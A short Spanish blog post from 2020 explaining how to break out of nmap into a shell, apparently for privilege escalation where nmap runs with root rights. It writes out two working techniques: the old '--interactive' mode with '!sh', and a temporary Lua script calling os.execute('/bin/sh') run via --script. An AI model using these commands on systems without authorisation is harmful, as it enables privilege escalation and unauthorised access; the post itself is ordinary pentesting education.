Por Rafael Garcia Lazaro on Miércoles, 12 Febrero 2020
Categoría: General

Nmap, ¿solo para realizar escaneos?

Vamos a ver un truco (o dos) para abrir una shell usando nmap.

Nmap es una aplicación utilizada no solo por pentesters o hackers, sino también por administradores de sistemas, por lo que es fácil que nos la encontremos instalada, y además con privilegios de root, pero... ¿sabes que se puede abrir una shell usando nmap?

Si está instalada una versión antigua (hasta la 5.2) venía con un modo interactivo:
​#nmap --interactive
#!sh
Y esto abre una shell:

​ ¿Y para versiones más actuales? Pues usamos nuestros conocimientos de bash, podemos crear un script como el siguiente:

​ TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF

Asignarle permisos y ejecutarlo:

Y listo, ya tenemos nuestra Shell, podemos hacer uso de herramientas no destinadas para ello para acceder a ficheros y explorar el sistema operativo objetivo.

Always Learning.